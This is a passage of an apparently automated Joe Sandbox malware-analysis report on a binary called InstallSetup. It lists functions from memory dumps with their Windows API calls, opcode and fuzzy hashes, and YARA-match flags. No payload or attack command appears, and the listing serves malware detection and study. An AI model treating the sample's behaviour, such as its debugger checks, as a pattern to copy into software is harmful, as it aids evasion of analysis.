Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9

Function 0042EAE0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

C, xrefs: 0042EAFD, 0042ECA8, 0042EECC, 0042EE66, 0042ECF6, 0042EC84
C, xrefs: 0042EF48, 0042ED32, 0042EBC1

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID:
String ID: C$C
API String ID: 0-238425240
Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94

Function 0097B271 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00972141: GetLastError.KERNEL32(?,?,0096A9EC,?,00000000,?,0096CDE6,0094247E,00000000,?,00451F20), ref: 00972145
Part of subcall function 00972141: _free.LIBCMT ref: 00972178
Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721B9

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00970A23,?,?,?,?,0097047A,?,00000004), ref: 0097B353
_wcschr.LIBVCRUNTIME ref: 0097B3E3
_wcschr.LIBVCRUNTIME ref: 0097B3F1
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00970A23,00000000,00970B43), ref: 0097B494

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction ID: 4503123228084f8632c8c2e3c94510b5f1778d03a3f6e1bdcfaac011ff4c7176
Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction Fuzzy Hash: BA61D673600606AADB24AB74CC46BBB73ACFF45710F14C42AF91DD7192EB74D94087A1

Function 0043B00A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
_wcschr.LIBVCRUNTIME ref: 0043B17C
_wcschr.LIBVCRUNTIME ref: 0043B18A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9

Function 0043B3F5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free
String ID:
API String ID: 2834031935-0
Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
Opcode Fuzzy Hash: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99

Function 0096A63A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0094DAD7), ref: 0096A732
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0094DAD7), ref: 0096A73C
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0094DAD7), ref: 0096A749

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction ID: 428257759de9c0c76af4c0856fd5ee8e7a5513391c93ddd2366eb7baebc9e575
Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction Fuzzy Hash: C131B37490131C9BCB21DF64D989B9CBBB8BF48711F5042EAE80CA7261E7309F858F45

Function 0042A3D3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49

Function 009700C6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,0097009C,00000000,00457970,0000000C,009701F3,00000000,00000002,00000000), ref: 009700E7
TerminateProcess.KERNEL32(00000000,?,0097009C,00000000,00457970,0000000C,009701F3,00000000,00000002,00000000), ref: 009700EE
ExitProcess.KERNEL32 ref: 00970100

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: 117d24cdf5fb5edefe51384678a365b7fcd2d0c1339a7757fa6838ef30dd8fe2
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: 08E0B636000648EBCF11AF94DD09B593B69FB86B52F108024F9098B131CB76EE42DA44

Function 0042FE5F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
ExitProcess.KERNEL32 ref: 0042FE99

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88

Function 0094092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 00940966
GetProcAddress., xrefs: 009409DC, 009409DF, 009409E4
., xrefs: 0094095F

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 1881473ebb8cc92b2ed4aa44de7bd22430dcd9ab104b5d0f7d18c9599c015af2
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: C4316BB6910609DFDB10CF99C880AAEBBF9FF88324F24404AD941A7351D775EA45CFA4

Function 00978C59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 00978D23

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
Instruction ID: 563932776666e6211f3f87e4b0b5d97461f39c6889b6dc5427425fc23b936ab1
Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
Instruction Fuzzy Hash: 9F412873540219AFCB209FB9CC4DEAB777CEB80710F1486A9F909D7180EA319D41CB60

Function 004389F2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 00438ABC

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58

Function 004351C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213

Strings

GetLocaleInfoEx, xrefs: 004351D1, 004351DB

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE

Function 0096ED47 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction ID: 0afedf8882a017107d659bbc94b6079ebba79827d27c7de93e2fa1c95c8beb1f
Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction Fuzzy Hash: 36023C71E002199FDF14CFA9D9906ADBBF5EF88314F25816AE819E7380D731AD41CB80

Function 00942605 Relevance: 3.1, APIs: 2, Instructions: 125nativewindowCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0094262C
PostQuitMessage.USER32(00000000), ref: 009427CA

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: MessageNtdllPostProc_QuitWindow
String ID:
API String ID: 4264772764-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: 2ccd396383c974b82947d6f3b9a2ba7be3c53a44d28496a3bc317a328ae968d9
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: E6412F25A64384A5E731FFA5BC45B2537B4FF64722F10252BE528CB2B2E3B28540C75E

Function 00976F26 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00976F21,?,?,00000008,?,?,0097F3E2,00000000), ref: 00977153

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 117526904f92a134fc5b404cceab00a618926cd756111b483f802db34151f789
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: F6B14B322146089FD715CF68C48AB65BBE1FF45364F69C658E89DCF2A1C335E991CB40

Function 00436CBF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44

Function 0097B8AC Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00972141: GetLastError.KERNEL32(?,?,0096A9EC,?,00000000,?,0096CDE6,0094247E,00000000,?,00451F20), ref: 00972145
Part of subcall function 00972141: _free.LIBCMT ref: 00972178
Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721B9

Part of subcall function 00972141: _free.LIBCMT ref: 009721A0
Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721AD

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0097B900

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction ID: d32ab611c236f1c82c1eef8d99b45415b4ee4f14b00c04bc7d69304886c1b437
Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction Fuzzy Hash: D221AF3395020AABDB24AF24DC46BBA73ACEF41318F10817AEF19D6191EB39DD44CB50

Function 0043B645 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99

Function 0097B534 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00972141: GetLastError.KERNEL32(?,?,0096A9EC,?,00000000,?,0096CDE6,0094247E,00000000,?,00451F20), ref: 00972145
Part of subcall function 00972141: _free.LIBCMT ref: 00972178
Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721B9

EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,00970A1C,?,0097BC89,00000000,?,?,?), ref: 0097B5A6

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
Instruction ID: aded6ab1230c9ea2e36cc7c6c8b90f0057825cd11b4550ea9e600a5c58c54a78
Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
Instruction Fuzzy Hash: 88110C3B2047059FDB189F39C89177ABB95FF84758B15882DEA4A87640D771B942CB40

Function 0043B2CD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784

Function 0097BADC Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00972141: GetLastError.KERNEL32(?,?,0096A9EC,?,00000000,?,0096CDE6,0094247E,00000000,?,00451F20), ref: 00972145
Part of subcall function 00972141: _free.LIBCMT ref: 00972178
Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721B9

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0097B87A,00000000,00000000,?), ref: 0097BB08

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction ID: fa152d8a7238bcfbefeea035595431ef022d894aeda3beb01882969ce8f81f90
Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction Fuzzy Hash: 0CF0F433A10119ABDB289B24CC45BBAB76CEB40764F158469ED0EA3144EB74BE0286D0

Function 0043B875 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8

Function 0097B8A3 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00972141: GetLastError.KERNEL32(?,?,0096A9EC,?,00000000,?,0096CDE6,0094247E,00000000,?,00451F20), ref: 00972145
Part of subcall function 00972141: _free.LIBCMT ref: 00972178
Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721B9

Part of subcall function 00972141: _free.LIBCMT ref: 009721A0
Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721AD

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0097B900

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
Instruction ID: 1e8e37f2ca4ee700598b9ba113929b461bead2fb3c0afe95ad99c0a1fd659ca6
Opcode Fuzzy Hash: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
Instruction Fuzzy Hash: B5012633A551059BCB14AF34DC81BBA33A8EF45311B0481BAEF0ADB282DA355D048750

Function 0097B5CF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00972141: GetLastError.KERNEL32(?,?,0096A9EC,?,00000000,?,0096CDE6,0094247E,00000000,?,00451F20), ref: 00972145
Part of subcall function 00972141: _free.LIBCMT ref: 00972178
Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721B9

EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,00970A1C,?,0097BC4D,00970A1C,?,?,?,?,?,00970A1C,?,?), ref: 0097B61B

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
Instruction ID: 8c0cfcfd4efb4c20432a2ab574786e866ccb3c084d1e16654bdb74bdec4f9d83
Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
Instruction Fuzzy Hash: EBF0C2373007085FDB246F39DC81B7A7B95EF81768F15842DFA098B651D7719C028644

Function 0043B368 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4

Memory Dump Source

